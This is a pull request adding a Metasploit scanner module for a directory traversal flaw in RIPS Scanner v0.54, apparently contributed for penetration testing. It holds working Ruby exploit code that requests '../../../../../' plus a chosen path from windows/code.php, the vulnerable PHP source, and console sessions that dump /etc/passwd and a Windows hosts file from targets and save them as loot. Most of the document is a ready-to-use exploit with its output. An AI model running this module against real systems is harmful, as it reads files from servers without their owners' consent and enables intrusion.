### PR TITLE
Add Directory Traversal for RIPS Scanner

### DIFF
--- a/modules/auxiliary/scanner/http/rips_traversal.rb
+++ b/modules/auxiliary/scanner/http/rips_traversal.rb
@@ -1,0 +1,97 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'RIPS Scanner Directory Traversal',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54
+        The vulnerability affects to Windows and Linux systems.
+      },
+      'References'     =>
+        [
+          ['URL', 'http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html']
+        ],
+      'Author'         => 'Roberto Soares Espreto <robertoespreto[at]gmail.com>',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true,  "The URI path to the web application", "/rips/"]),
+        OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    traversal = "../../../../../"
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'windows', 'code.php'),
+      'vars_get' =>
+        {
+          'file' => "#{traversal}#{filename}"
+        }
+    })
+
+    if res &&
+        res.code == 200 &&
+        res.headers.include?('Set-Cookie') &&
+        res.body.length > 304
+
+      html = Nokogiri::HTML(res.body)
+      html_clean = html.search('.codeline').text
+      print_line("#{html_clean}")
+
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'rips.traversal',
+        'text/plain',
+        ip,
+        html_clean,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded")
+    end
+  end
+end
+=begin
+ 102    $file = $_GET['file'];
+ 103    $marklines = explode(',', $_GET['lines']);
+ 104
+ 105
+ 106    if(!empty($file))
+ 107    {
+ 108            $lines = file($file);
+ 109
+ 110            // place line numbers in extra table for more elegant copy/paste without line numbers
+ 111            echo '<tr><td><table>';
+ 112            for($i=1, $max=count($lines); $i<=$max;$i++)
+ 113                    echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
+ 114            echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
+ 115
+ 116            $in_comment = false;
+ 117            for($i=0; $i<$max; $i++)
+ 118            {
+ 119                    $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
+ 120            }
+ 121    }
+=end


### PR DESCRIPTION
#### Module to read file via directory traversal in RIPS Scanner.

  Application: RIPS Scanner v0.54
  Homepage: http://rips-scanner.sourceforge.net/
  References: http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html
#### Vulnerable packages*

  RIPS Scanner Version 0.54 
#### Usage:
##### Linux (Kali):

```
msf > use auxiliary/scanner/http/rips_traversal 
msf auxiliary(rips_traversal) > show options 

Module options (auxiliary/scanner/http/rips_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /rips/           yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(rips_traversal) > info

       Name: RIPS Scanner Directory Traversal
     Module: auxiliary/scanner/http/rips_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILEPATH   /etc/passwd      yes       The path to the file to read
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /rips/           yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in the RIPS 
  Scanner v0.54 The vulnerability affects to Windows and Linux 
  systems.

References:
  http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html

msf auxiliary(rips_traversal) > set RHOSTS 192.168.1.40
RHOSTS => 192.168.1.40
msf auxiliary(rips_traversal) > run

 root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
  messagebus:x:102:106::/var/run/dbus:/bin/false
  colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
  usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
  miredo:x:105:65534::/var/run/miredo:/bin/false
  ntp:x:106:112::/home/ntp:/bin/false
  Debian-exim:x:107:113::/var/spool/exim4:/bin/false
  arpwatch:x:108:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
  avahi:x:109:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  beef-xss:x:110:118::/var/lib/beef-xss:/bin/false
  dradis:x:111:120::/var/lib/dradis:/bin/false
  pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  haldaemon:x:114:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
  sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
  snmp:x:116:125::/var/lib/snmp:/bin/false
  iodine:x:117:65534::/var/run/iodine:/bin/false
  postgres:x:118:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  redsocks:x:119:128::/var/run/redsocks:/bin/false
  stunnel4:x:120:129::/var/run/stunnel4:/bin/false
  statd:x:121:65534::/var/lib/nfs:/bin/false
  sslh:x:122:132::/nonexistent:/bin/false
  Debian-gdm:x:123:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
  rtkit:x:124:134:RealtimeKit,,,:/proc:/bin/false
  saned:x:125:135::/home/saned:/bin/false
  vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  debian-tor:x:126:136::/var/lib/tor:/bin/false
  privoxy:x:127:65534::/etc/privoxy:/bin/false
 
[+] 192.168.1.40:80 - File saved in: /home/espreto/.msf4/loot/20150327052351_default_192.168.1.40_rips.traversal_037872.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rips_traversal) >
```
##### Windows (Version 8)

```
msf auxiliary(rips_traversal) > set RHOSTS 192.168.1.44
RHOSTS => 192.168.1.44
msf auxiliary(rips_traversal) > set FILEPATH Windows/System32/Drivers/etc/hosts
FILEPATH => Windows/System32/Drivers/etc/hosts
msf auxiliary(rips_traversal) > run

<? # Copyright (c) 1993-2009 Microsoft Corp.
 <? #
 <? # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
 <? #
 <? # This file contains the mappings of IP addresses to host names. Each
 <? # entry should be kept on an individual line. The IP address should
 <? # be placed in the first column followed by the corresponding host name.
 <? # The IP address and the host name should be separated by at least one
 <? # space.
 <? #
 <? # Additionally, comments (such as these) may be inserted on individual
 <? # lines or following the machine name denoted by a '#' symbol.
 <? #
 <? # For example:
 <? #
 <? #      102.54.94.97     rhino.acme.com          # source server
 <? #       38.25.63.10     x.acme.com              # x client host
 <? 
 <? # localhost name resolution is handled within DNS itself.
 <? #   127.0.0.1       localhost
 <? #   ::1             localhost
 <? 
 <? 127.0.0.1       localhost 
[+] 192.168.1.44:80 - File saved in: /home/espreto/.msf4/loot/20150327052545_default_192.168.1.44_rips.traversal_895489.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rips_traversal) >
```
